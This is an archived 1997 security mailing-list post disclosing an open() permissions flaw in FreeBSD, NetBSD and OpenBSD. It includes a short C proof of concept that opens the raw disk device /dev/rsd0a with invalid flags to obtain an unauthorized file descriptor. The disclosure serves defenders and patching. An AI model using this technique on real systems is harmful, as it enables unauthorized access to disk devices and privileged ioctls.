Possible SERIOUS bug in open()?

Aleph One (aleph1@dfw.net)
Thu, 23 Oct 1997 10:04:42 -0500

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Alan Cox: "Vulnerability in metamail"
Previous message: Paul Tatarsky: "IRIX /var/inst/patchbase"
Next in thread: Aleph One: "Re: Possible SERIOUS bug in open()?"

[ This affects {Free,Net,Open}BSD. Joerg Wunsch fixed it yesterday in
freebsd-current. - a1 ]

---------- Forwarded message ----------
Date: 17 Oct 1997 10:42:13 -0000
From: explorer@flame.org
To: best-of-security@cyber.com.au
Subject: BoS: Possible SERIOUS bug in open()?

This was sent to me recently... It seems to be a pretty serious hole
in open() and permissions...

Note, in the following, open() succeeds, and ioctls are probably
executed...

/*
* This will give you a file descriptor on a device you should not have
* access to. This seems really, really screwed up, since holding a fd
* lets you do a lot of ioctls that you should not be able to do...
*/
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <err.h>

int
main(int argc, char **argv)
{
int fd;

fd = open("/dev/rsd0a", -1, 0);

if (fd < 0)
err(1, "open");
}

Next message: Alan Cox: "Vulnerability in metamail"
Previous message: Paul Tatarsky: "IRIX /var/inst/patchbase"
Next in thread: Aleph One: "Re: Possible SERIOUS bug in open()?"